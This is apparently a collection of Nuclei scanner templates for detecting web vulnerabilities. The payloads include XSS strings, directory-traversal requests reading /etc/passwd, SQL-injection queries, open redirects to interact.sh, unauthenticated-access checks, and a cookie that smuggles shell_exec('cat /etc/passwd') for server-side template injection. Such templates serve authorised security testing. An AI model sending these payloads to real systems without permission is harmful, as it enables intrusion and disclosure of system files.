-------------------------------------------------------------------------------- 1 | id: eclipse-help-system-xss 2 | 3 | info: 4 | name: Eclipse Help System RXSS vulnerability 5 | author: pikpikcu 6 | severity: medium 7 | tags: ibm,xss 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/help/index.jsp?view=%3Cscript%3Ealert(document.cookie)%3C/script%3E" 13 | matchers-condition: and 14 | matchers: 15 | - type: status 16 | status: 17 | - 200 18 | - type: word 19 | words: 20 | - "" 21 | part: body 22 | - type: word 23 | words: 24 | - "text/html" 25 | part: header -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/ibm/ibm-infoprint-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: ibm-infoprint-lfi 2 | 3 | info: 4 | name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal 5 | author: harshbothra_ 6 | severity: medium 7 | description: Directory traversal vulnerability on IBM InfoPrint 4247-Z03 Impact Matrix Printer. 
8 | reference: 9 | - https://www.exploit-db.com/exploits/47835 10 | tags: ibm,lfi,matrix,printer 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - '{{BaseURL}}/./../../../../../../../../../../etc/passwd' 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: regex 22 | regex: 23 | - "root:.*:0:0:" 24 | part: body 25 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/jenkins/jenkins-asyncpeople.yaml: -------------------------------------------------------------------------------- 1 | id: jenkins-async-people 2 | 3 | info: 4 | name: Jenkins panel async-people 5 | author: nadino 6 | severity: info 7 | reference: 8 | - https://bugs.eclipse.org/bugs/show_bug.cgi?id=564944 9 | - https://issues.jenkins.io/browse/JENKINS-30107 10 | - https://issues.jenkins.io/browse/JENKINS-18884 11 | - https://issues.jenkins.io/browse/JENKINS-26469 12 | tags: jenkins 13 | 14 | requests: 15 | - method: GET 16 | path: 17 | - "{{BaseURL}}/asynchPeople/" 18 | matchers: 19 | - type: word 20 | words: 21 | - "People - [Jenkins]" 22 | part: body 23 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/jenkins/unaunthenticated-jenkin.yaml: -------------------------------------------------------------------------------- 1 | id: unaunthenticated-jenkin 2 | 3 | info: 4 | name: Unauthenticated Jenkins Dashboard 5 | author: dhiyaneshDK 6 | severity: high 7 | tags: jenkins 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - Dashboard [Jenkins] 19 | condition: and 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/jira/jira-service-desk-signup.yaml: 
-------------------------------------------------------------------------------- 1 | id: jira-service-desk-signup 2 | 3 | info: 4 | name: Jira Service Desk Signup 5 | author: TechbrunchFR 6 | severity: medium 7 | tags: jira,atlassian,service 8 | 9 | requests: 10 | - method: POST 11 | path: 12 | - "{{BaseURL}}/servicedesk/customer/user/signup" 13 | headers: 14 | Content-Type: application/json 15 | body: '{"email":"invalid","signUpContext":{},"secondaryEmail":"","usingNewUi":true}' 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | words: 20 | - "signup.validation.errors" 21 | - type: status 22 | status: 23 | - 400 24 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml: -------------------------------------------------------------------------------- 1 | id: jira-unauthenticated-adminprojects 2 | 3 | info: 4 | name: Jira Unauthenticated Admin Projects 5 | author: TESS 6 | severity: info 7 | tags: atlassian,jira 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/rest/menu/latest/admin" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'key' 19 | - 'link' 20 | - 'label' 21 | - 'self' 22 | condition: and 23 | 24 | - type: status 25 | status: 26 | - 200 27 | 28 | - type: word 29 | part: header 30 | words: 31 | - "atlassian.xsrf.token" 32 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/jira/jira-unauthenticated-projectcategories.yaml: -------------------------------------------------------------------------------- 1 | id: jira-unauthenticated-projectcategories 2 | 3 | info: 4 | name: Jira Unauthenticated Project Categories 5 | author: TESS 6 | severity: info 7 | tags: atlassian,jira 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/rest/api/2/projectCategory?maxResults=1000" 13 | 14 | matchers-condition: 
and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'self' 19 | - 'description' 20 | - 'name' 21 | condition: and 22 | 23 | - type: status 24 | status: 25 | - 200 26 | 27 | - type: word 28 | part: header 29 | words: 30 | - "atlassian.xsrf.token" 31 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/jira/jira-unauthenticated-projects.yaml: -------------------------------------------------------------------------------- 1 | id: jira-unauthenticated-projects 2 | 3 | info: 4 | name: Jira Unauthenticated Projects 5 | author: TechbrunchFR 6 | severity: info 7 | tags: atlassian,jira 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/rest/api/2/project?maxResults=100" 13 | matchers: 14 | - type: word 15 | words: 16 | - 'projects' 17 | - 'startAt' 18 | - 'maxResults' 19 | condition: and 20 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/jira/jira-unauthenticated-resolutions.yaml: -------------------------------------------------------------------------------- 1 | id: jira-unauthenticated-resolutions 2 | 3 | info: 4 | name: Jira Unauthenticated Resolutions 5 | author: TESS 6 | severity: info 7 | tags: atlassian,jira 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/rest/api/2/resolution" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'self' 19 | - 'description' 20 | - 'name' 21 | condition: and 22 | 23 | - type: status 24 | status: 25 | - 200 26 | 27 | - type: word 28 | part: header 29 | words: 30 | - "atlassian.xsrf.token" -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml: -------------------------------------------------------------------------------- 1 | id: jira-unauthenticated-user-picker 2 | 3 | info: 4 | name: Jira Unauthenticated User 
Picker 5 | author: TechbrunchFR 6 | severity: info 7 | tags: atlassian,jira 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/secure/popups/UserPickerBrowser.jspa" 13 | matchers: 14 | - type: word 15 | words: 16 | - 'user-picker' -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: moodle-filter-jmol-lfi 2 | 3 | info: 4 | name: Moodle filter_jmol - LFI 5 | author: madrobot 6 | severity: high 7 | description: Local file inclusion on Moodle. 8 | tags: moodle,lfi 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd" 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | - type: regex 20 | regex: 21 | - "root:.*:0:0:" 22 | part: body 23 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/acme-xss.yaml: -------------------------------------------------------------------------------- 1 | id: acme-xss 2 | 3 | info: 4 | name: ACME / Let's Encrypt Reflected XSS 5 | author: pdteam 6 | severity: medium 7 | tags: xss,acme 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - "alert(document.domain)" 19 | - type: word 20 | words: 21 | - "/xml" 22 | - "/html" 23 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/asanhamayesh-lfi.yaml: -------------------------------------------------------------------------------- 1 | 
id: asanhamayesh-lfi 2 | 3 | info: 4 | name: Asanhamayesh CMS 3.4.6 Directory traversal Vulnerability 5 | author: 0x_Akoko 6 | severity: high 7 | reference: 8 | - https://cxsecurity.com/issue/WLB-2018030006 9 | - https://asanhamayesh.com 10 | tags: asanhamayesh,lfi,traversal 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/downloadfile.php?file=../../../../../../../../../../etc/passwd" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: regex 20 | regex: 21 | - "root:[x*]:0:0" 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/aspnuke-openredirect.yaml: -------------------------------------------------------------------------------- 1 | id: aspnuke-openredirect 2 | 3 | info: 4 | name: ASP-Nuke Open Redirect 5 | author: pdteam 6 | severity: low 7 | tags: aspnuke,redirect 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/gotoURL.asp?url=interact.sh&id=43569" 13 | 14 | matchers: 15 | - type: regex 16 | part: header 17 | regex: 18 | - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*)$' -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/blue-ocean-excellence-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: blue-ocean-excellence-lfi 2 | 3 | info: 4 | name: Blue Ocean Excellence LFI 5 | author: pikpikcu 6 | severity: high 7 | reference: 8 | - https://blog.csdn.net/qq_41901122/article/details/116786883 9 | tags: blue-ocean,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/download.php?file=../../../../../etc/passwd" 15 | 16 | matchers-condition: and 17 | matchers: 18 | 19 | - type: regex 20 | regex: 21 | - "toor:[x*]:0:0" 22 | 23 | - type: status 24 | status: 25 | - 200 26 | 
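--------------------------------------------------------------------------------
/pocs_yml/nucleiFiles/vulnerabilities/other/couchdb-adminparty.yaml:
--------------------------------------------------------------------------------
id: couchdb-adminparty

info:
  name: CouchDB Admin Party
  author: organiccrap
  severity: high
  description: Requests made against CouchDB are done in the context of an admin user.
  tags: couchdb

requests:
  # The request carries no credentials; a populated _all_docs listing of the
  # _users database in the response is what the matchers below look for.
  - method: GET
    path:
      - '{{BaseURL}}/_users/_all_docs'

    matchers-condition: and
    matchers:
      # Header check: both banner fragments must be present, so an unrelated
      # JSON API that happens to return "total_rows" is not reported.
      - type: word
        words:
          - CouchDB/
          - Erlang OTP/
        part: header
        condition: and
      # Body check: both keys of the _all_docs result must be present.
      - type: word
        words:
          - total_rows
          - offset
        part: body
        condition: and

--------------------------------------------------------------------------------
/pocs_yml/nucleiFiles/vulnerabilities/other/discourse-xss.yaml:
--------------------------------------------------------------------------------
id: discourse-xss

info:
  name: Discourse CMS - XSS
  author: madrobot
  severity: medium
  description: Cross-site scripting (XSS) on Discourse CMS
  tags: xss,discourse

requests:
  - method: GET
    path:
      - '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(/xss/)%3E'
    # All three matchers must hold: 200, the marker reflected unencoded in the
    # body, and an HTML content type (so the reflection would be rendered).
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      # The word was an empty string here, which matches every body and left
      # the template reporting any 200 text/html response. Restored to the
      # URL-decoded marker from the request path above, so only an unencoded
      # reflection counts.
      - type: word
        words:
          - "<svg/onload=alert(/xss/)>"
        part: body

      - type: word
        words:
          - "text/html"
        part: header

--------------------------------------------------------------------------------
/pocs_yml/nucleiFiles/vulnerabilities/other/dss-download-fileread.yaml: -------------------------------------------------------------------------------- 1 | id: dss-download-fileread 2 | 3 | info: 4 | name: DSS Download File Read 5 | author: ritikchaddha 6 | severity: high 7 | tags: lfi,dss,lfr 8 | 9 | requests: 10 | - method: 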
GET 11 | path: 12 | - "{{BaseURL}}/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd" 13 | 14 | redirects: true 15 | max-redirects: 2 16 | matchers-condition: and 17 | matchers: 18 | - type: regex 19 | regex: 20 | - "root:[x*]:0:0:" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/duomicms-sql-injection.yaml: -------------------------------------------------------------------------------- 1 | id: duomicms-sql-injection 2 | 3 | info: 4 | name: DuomiCMS SQL Injection 5 | author: pikpikcu 6 | severity: high 7 | reference: 8 | - https://redn3ck.github.io/2016/11/01/duomiCMS/ 9 | tags: duomicms,sqli 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999)))" 15 | 16 | matchers-condition: and 17 | matchers: 18 | 19 | - type: word 20 | words: 21 | - "e0ec043b3f9e198ec09041687e4d4e8d" 22 | part: body 23 | condition: and 24 | 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/empirecms-xss.yaml: -------------------------------------------------------------------------------- 1 | id: empirecms-xss 2 | 3 | info: 4 | name: EmpireCMS v75 XSS 5 | author: pikpikcu 6 | severity: medium 7 | reference: 8 | - https://www.geek-share.com/detail/2777280260.html 9 | tags: empirecms,xss 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(document.domain)" 15 | 16 | matchers-condition: and 17 | matchers: 18 | 19 | - type: word 20 | words: 21 | - 'onmousewheel=\"return bbimg(this)\"' 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- 
/pocs_yml/nucleiFiles/vulnerabilities/other/flir-path-traversal.yaml: -------------------------------------------------------------------------------- 1 | id: flir-path-traversal 2 | 3 | info: 4 | name: Flir Path Traversal 5 | author: pikpikcu 6 | severity: high 7 | reference: 8 | - https://juejin.cn/post/6961370156484263972 9 | tags: flir,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/download.php?file=/etc/passwd" 15 | 16 | matchers-condition: and 17 | matchers: 18 | 19 | - type: regex 20 | regex: 21 | - "root:.*:0:0:" 22 | condition: and 23 | 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/global-domains-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: global-domains-lfi 2 | 3 | info: 4 | name: Global Domains International Directory traversal Vulnerability 5 | author: 0x_Akoko 6 | severity: high 7 | reference: 8 | - https://cxsecurity.com/issue/WLB-2018020247 9 | - http://www.nic.ws 10 | tags: globaldomains,lfi,traversal 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/kvmlm2/index.dhtml?fname=&language=../../../../../../../../../../etc/passwd%00.jpg&lname=&sponsor=gdi&template=11" 16 | 17 | matchers-condition: and 18 | matchers: 19 | - type: regex 20 | regex: 21 | - "root:[x*]:0:0" 22 | 23 | - type: status 24 | status: 25 | - 200 26 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/groupoffice-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: groupoffice-lfi 2 | 3 | info: 4 | name: Groupoffice 3.4.21 Directory Traversal Vulnerability 5 | author: 0x_Akoko 6 | severity: high 7 | reference: 8 | - https://cxsecurity.com/issue/WLB-2018020249 9 | - http://www.group-office.com 10 | tags: groupoffice,lfi,traversal 11 | 12 | 
requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/compress.php?file=../../../../../../../etc/passwd" 16 | 17 | matchers-condition: and 18 | matchers: 19 | 20 | - type: regex 21 | regex: 22 | - "root:[x*]:0:0" 23 | 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/huawei-hg659-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: huawei-hg659-lfi 2 | 3 | info: 4 | name: HUAWEI HG659 LFI 5 | author: pikpikcu 6 | severity: high 7 | reference: 8 | - https://twitter.com/sec715/status/1406782172443287559 9 | tags: lfi,huawei 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/lib///....//....//....//....//....//....//....//....//etc//passwd" 15 | 16 | matchers-condition: and 17 | matchers: 18 | 19 | - type: regex 20 | regex: 21 | - "root:.*:0:0:" 22 | condition: and 23 | 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/myucms-lfr.yaml: -------------------------------------------------------------------------------- 1 | id: myucms-lfr 2 | 3 | info: 4 | name: MyuCMS Local File Read 5 | author: princechaddha 6 | severity: high 7 | reference: 8 | - https://blog.csdn.net/yalecaltech/article/details/104908257 9 | tags: myucms,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1" 15 | matchers: 16 | - type: regex 17 | regex: 18 | - "root:.*:0:0:" 19 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/natshell-path-traversal.yaml: -------------------------------------------------------------------------------- 1 | id: natshell-path-traversal 2 | 3 | info: 4 | name: NatShell Path Traversal 5 | author: 
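pikpikcu 6 | severity: high 7 | reference: 8 | - https://mp.weixin.qq.com/s/g4YNI6UBqIQcKL0TRkKWlw 9 | metadata: 10 | fofa-query: title="蓝海卓越计费管理系统" 11 | tags: natshell,lfi 12 | 13 | requests: 14 | - method: GET 15 | path: 16 | - "{{BaseURL}}/download.php?file=../../../../../etc/passwd" 17 | 18 | matchers-condition: and 19 | matchers: 20 | 21 | - type: regex 22 | regex: 23 | - "toor:[x*]:0:0" 24 | 25 | - type: status 26 | status: 27 | - 200 28 |
--------------------------------------------------------------------------------
/pocs_yml/nucleiFiles/vulnerabilities/other/nginx-module-vts-xss.yaml:
--------------------------------------------------------------------------------
id: nginx-module-vts-xss

info:
  name: Nginx Virtual Host Traffic Status Module - Cross-Site Scripting
  author: madrobot
  severity: medium
  tags: nginx,xss,status

requests:
  - method: GET
    path:
      - "{{BaseURL}}/status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E"

    # All three matchers must hold: 200, the marker reflected unencoded in the
    # body, and an HTML content type (so the reflection would be rendered).
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      # The word was an empty string here, which matches every body and left
      # the template reporting any 200 text/html response. Restored to the
      # URL-decoded marker from the request path above, so an HTML-escaped
      # echo of the path does not count as a finding.
      - type: word
        words:
          - "<script>alert(31337)</script>"
        part: body

      - type: word
        words:
          - "text/html"
        part: header

--------------------------------------------------------------------------------
/pocs_yml/nucleiFiles/vulnerabilities/other/nuuo-file-inclusion.yaml: -------------------------------------------------------------------------------- 1 | id: nuuo-file-inclusion 2 | 3 | info: 4 | name: NUUO NVRmini 2 v3.0.8 - Atrbitary File Retrieval 5 | author: princechaddha 6 | severity: high 7 | reference: 8 | - https://www.exploit-db.com/exploits/40211 9 | tags: nuuo,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/css_parser.php?css=css_parser.php" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - "$_GET['css']" 22 | 23 | - type: word 24 | part: header 25 | words: 26 | - "text/css" 27 | 28 | - type: status 29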
| status: 30 | - 200 31 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/odoo-cms-redirect.yaml: -------------------------------------------------------------------------------- 1 | id: odoo-cms-redirect 2 | 3 | info: 4 | name: Odoo CMS - Open Redirect 5 | author: 0x_Akoko 6 | severity: low 7 | description: Odoo CMS - Open redirection in all versions due to Odoo's policy. 8 | reference: 9 | - https://cxsecurity.com/issue/WLB-2021020143 10 | - https://www.odoo.com/page/security-nonvuln-redirectors 11 | tags: odoo,redirect 12 | 13 | requests: 14 | - method: GET 15 | path: 16 | - "{{BaseURL}}/website/lang/en_US?r=https://interact.sh/" 17 | 18 | matchers: 19 | - type: regex 20 | regex: 21 | - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' 22 | part: header 23 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/pacsone-server-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: pacsone-server-lfi 2 | 3 | info: 4 | name: PACSOne Server 6.6.2 DICOM Web Viewer Directory Trasversal 5 | author: 0x_Akoko 6 | severity: high 7 | reference: 8 | - https://cxsecurity.com/issue/WLB-2018010303 9 | tags: pacsone,lfi 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/pacsone/nocache.php?path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: regex 19 | regex: 20 | - "root:[x*]:0:0" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml: -------------------------------------------------------------------------------- 1 | id: pdf-signer-ssti-to-rce 2 | 3 | info: 4 | name: PDF Signer v3.0 - SSTI to 
RCE via CSRF Cookie 5 | author: madrobot 6 | severity: high 7 | tags: ssti,rce,csrf 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | headers: 14 | Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl" 15 | 16 | skip-variables-check: true 17 | matchers-condition: and 18 | matchers: 19 | - type: status 20 | status: 21 | - 200 22 | - type: regex 23 | regex: 24 | - "root:.*:0:0:" 25 | part: body 26 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/phpok-sqli.yaml: -------------------------------------------------------------------------------- 1 | id: phpok-sqli 2 | 3 | info: 4 | name: PHPOK - Sql Injection 5 | author: ritikchaddha 6 | severity: high 7 | metadata: 8 | fofa-query: app="phpok" 9 | tags: phpok,sqli 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/api.php?c=project&f=index&token=1234&id=news&sort=1 and extractvalue(1,concat(0x7e,md5({{randstr}}))) --+" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - '{{md5("{{randstr}}")}}' 22 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/phpwiki-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: phpwiki-lfi 2 | 3 | info: 4 | name: phpwiki 1.5.4 - XSS / Local File Inclusion 5 | author: 0x_Akoko 6 | severity: high 7 | description: A vulnerability in phpwiki allows remote unauthenticated attackers to include and return the content of locally stored files via the 'index.php' endpoint. 
8 | reference: 9 | - https://www.exploit-db.com/exploits/38027 10 | tags: phpwiki,lfi,xss 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/phpwiki/index.php/passwd" 16 | 17 | matchers-condition: and 18 | matchers: 19 | 20 | - type: regex 21 | regex: 22 | - "root:[x*]:0:0" 23 | 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/pmb-local-file-disclosure.yaml: -------------------------------------------------------------------------------- 1 | id: pmb-local-file-disclosure 2 | 3 | info: 4 | name: PMB 5.6 - getgif.php Arbitrary File Retrieval 5 | author: dhiyaneshDk 6 | severity: high 7 | reference: 8 | - https://www.exploit-db.com/exploits/49054 9 | tags: lfi,pmb 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - '{{BaseURL}}/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif=nuclei' 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: word 22 | words: 23 | - "root:x:0" 24 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/resin-cnnvd-200705-315.yaml: -------------------------------------------------------------------------------- 1 | id: resin-cnnvd-200705-315 2 | 3 | info: 4 | name: Caucho Resin Information Disclosure 5 | author: princechaddha 6 | severity: high 7 | reference: 8 | - http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-315 9 | tags: resin,caucho,lfr 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/%20../web-inf/" 15 | matchers-condition: and 16 | matchers: 17 | - type: status 18 | status: 19 | - 200 20 | 21 | - type: word 22 | words: 23 | - "/ ../web-inf/" 24 | - "Directory of /" 25 | condition: and 26 | part: body 27 | -------------------------------------------------------------------------------- 
/pocs_yml/nucleiFiles/vulnerabilities/other/seacms-sqli.yaml: -------------------------------------------------------------------------------- 1 | id: seacms-sqli 2 | 3 | info: 4 | name: SeaCMS V8.7 SQL Injection 5 | author: ritikchaddha 6 | severity: high 7 | reference: 8 | - https://www.uedbox.com/post/54561/ 9 | tags: seacms,sqli 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27`" 15 | 16 | redirects: true 17 | max-redirects: 2 18 | matchers-condition: and 19 | matchers: 20 | - type: word 21 | part: body 22 | words: 23 | - "6f7c6dcbc380aac3bcba1f9fccec991e" 24 | 25 | - type: status 26 | status: 27 | - 200 28 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/sl-studio-lfi.yaml: -------------------------------------------------------------------------------- 1 | id: sl-studio-lfi 2 | 3 | info: 4 | name: Webbdesign SL-Studio Directory Traversal 5 | author: 0x_Akoko 6 | severity: high 7 | reference: 8 | - https://cxsecurity.com/issue/WLB-2018110187 9 | metadata: 10 | google-dork: 'inurl:index.php?page= intext:Webbdesign: SL-Studio.' 
11 | tags: slstudio,lfi 12 | 13 | requests: 14 | - method: GET 15 | path: 16 | - "{{BaseURL}}/index.php?page=../../../../../../../../../../etc/passwd" 17 | 18 | matchers-condition: and 19 | matchers: 20 | - type: regex 21 | regex: 22 | - "root:[x*]:0:0" 23 | 24 | - type: status 25 | status: 26 | - 200 27 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/spark-webui-unauth.yaml: -------------------------------------------------------------------------------- 1 | id: spark-webui-unauth 2 | 3 | info: 4 | name: Unauthenticated Spark WebUI 5 | author: princechaddha 6 | severity: medium 7 | reference: 8 | - https://github.com/vulhub/vulhub/tree/master/spark/unacc 9 | tags: spark,unauth 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}" 15 | 16 | matchers-condition: and 17 | matchers: 18 | - type: status 19 | status: 20 | - 200 21 | - type: word 22 | words: 23 | - "Spark Master at spark://" 24 | - "URL:" 25 | part: body 26 | condition: and 27 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/symantec-messaging-gateway.yaml: -------------------------------------------------------------------------------- 1 | id: symantec-messaging-gateway 2 | 3 | info: 4 | name: Symantec Messaging Gateway LFI 5 | author: Random_Robbie 6 | severity: medium 7 | description: Symantec Messaging Gateway <= 10.6.1 Directory Traversal 8 | tags: lfi,messaging,symantec 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - "struts-default.xml" 20 | 21 | - type: status 22 | status: 23 | - 200 24 | -------------------------------------------------------------------------------- /pocs_yml/nucleiFiles/vulnerabilities/other/thinkific-redirect.yaml: 
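--------------------------------------------------------------------------------
id: thinkific-redirect

info:
  name: Open Redirect vulnerability on thinkific websites
  author: Gal Nagli
  severity: medium
  tags: redirect

requests:
  - method: GET

    path:
      - "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://interact.sh"

    # Both matchers must hold: a 302 whose Location header points at the host
    # supplied in error_url.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 302
      # This was a body word match on "ALL YOUR FILES HAVE BEEN LOCKED BY
      # DEADBOLT.", a string unrelated to a redirect response, so the template
      # could not report the issue it is named for. An open redirect is
      # evidenced by the Location header, so the check now reads that header;
      # the character class before the host keeps a same-site Location that
      # merely echoes the value in its query string from matching.
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
--------------------------------------------------------------------------------
/pocs_yml/nucleiFiles/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml:
--------------------------------------------------------------------------------
id: vmware-vcenter-lfi-linux

info:
  name: Vmware Vcenter LFI for Linux appliances
  author: PR3R00T
  severity: high
  tags: vmware,lfi,vcenter

requests:
  - method: GET
    path:
      - "{{BaseURL}}/eam/vib?id=/etc/issue"
    # Single body word and no status matcher: any response containing this
    # product string is reported.
    # NOTE(review): a login or error page that prints the product name would
    # also match — confirm findings manually.
    matchers:
      - type: word
        words:
          - "vCenter Server"

--------------------------------------------------------------------------------
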